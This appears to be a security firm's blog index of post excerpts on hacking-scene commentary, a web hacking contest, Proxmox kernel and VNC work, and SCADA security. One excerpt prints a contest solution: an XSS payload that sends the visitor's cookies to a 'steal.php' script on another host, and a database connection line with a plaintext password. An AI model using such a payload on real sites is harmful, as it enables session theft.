Yesterday I was reading an article based on a Microsoft report titled “Security researchers exploiting vulnerabilities“. For me, somebody who born in the security and hacking scene, it’s total nonsense. The community has been, finally, destroyed by a short sighted security market around five years ago in the five years before. Underground is dead, hackers […]

Thanks David for your lecture. It’s a very interesting set of considerations for somebody who, like me, has a background that doesn’t overlap with the subjects of macro-economics and global finance. Listening your words I can feel the ethics and vision that entail your enthusiasm on the topic. Regarding the micro-economic and daily use of […]

H-FARM supercharged the challenge with an amazing prize: an iPad Retina Mini! The contest consisted in three simple web pages to be hacked using the most common web security attack vectors: an XSS, a SQL Injection and a Local File Disclosure. Giacomo Rizzi demonstrated to be a developer aware of security issues, a paramount ability […]

Interested in the challenge source code and solutions? Download the PDF! ISGroup-HBANK-Challenge Solutions provided by Giacomo Rizzi, the winner of the contest: Challenge 1: H-FARM</textarea><script> (new Image()).src=”http://10.1.2.172/steal.php?cookies=”+document.cookie;</script><!– Challenge 2: UGOTMEMADHAXOR! Challenge 3: $link = mysql_connect(‘127.0.0.1’, ‘hackmehard’, ‘Psvm6bPywNQsaMNR’);

Venerdi 8 e sabato 9 ISGroup ha partecipato ad H-BANK, un’iniziativa organizzata da H-Farm Ventures presso la sede di Roncade (Treviso). H-Farm organizza, con cadenza quasi mensile, eventi dinamici e pieni di giovani sviluppatori, designer, presenti e futuri imprenditori. Questo trend positivo ha avuto inizio con HackItaly, a cui abbiamo partecipato creando un progetto ludico […]

Support for OCZ RevoDrive3, RevoDrive3 X2, zDrive R4 in Proxmox (and vanilla 2.6 kernel sources) is possible thanks to the work of robbat2 and geneanon. This repository contains all the information needed to patch your kernel and backport RevoDrive support in the stable 2.6.32 Proxmox kernel (The only one with OpenVZ support at the time of […]

Please sustain the request for better PCI Express SSD support in the stable version of Proxmox VE: post a comment on https://github.com/proxmox/pve-kernel-2.6.32/issues/1 and contact the maintainers! Dear Proxmox kernel mantainers, OCZ is providing a terrible Linux support, in an attempt to “protect” the technology of their VCA chip, build on a Marvell 88SE9485 controller. Basically they try […]

Proxmox VE has an administrative panel that allows connecting to KVM and OpenVZ virtual machines using a Java applet and the VNC protocol (RFB). The issue is that Java is a show-stopper for me, it’s unsafe, bloated and barely runs as a browser plugin. A lot of Proxmox users complain about this part of the […]

Paying for distribution. Is it worth it? Here at ISGroup we have some daily SEO and Social Media tasks concurring with Penetration Testing and Ethical Hacking sessions. Nowadays any sane company do some Media/PR/Communication in-house, right? And while we are in no way experts sometimes we perform better than “real” Media companies, at last from a […]

Extract from Federal Strategy Unit for IT FSUIT; Federal Intelligence Service FIS; Reporting and Analysis Centre for Information Assurance MELANI www.melani.admin.ch. Since the Stuxnet worm became known in the second half of 2010, there has been an increased focus on the security of SCADA software. The basic difficulty with SCADA systems lies especially in their history: originally, they were […]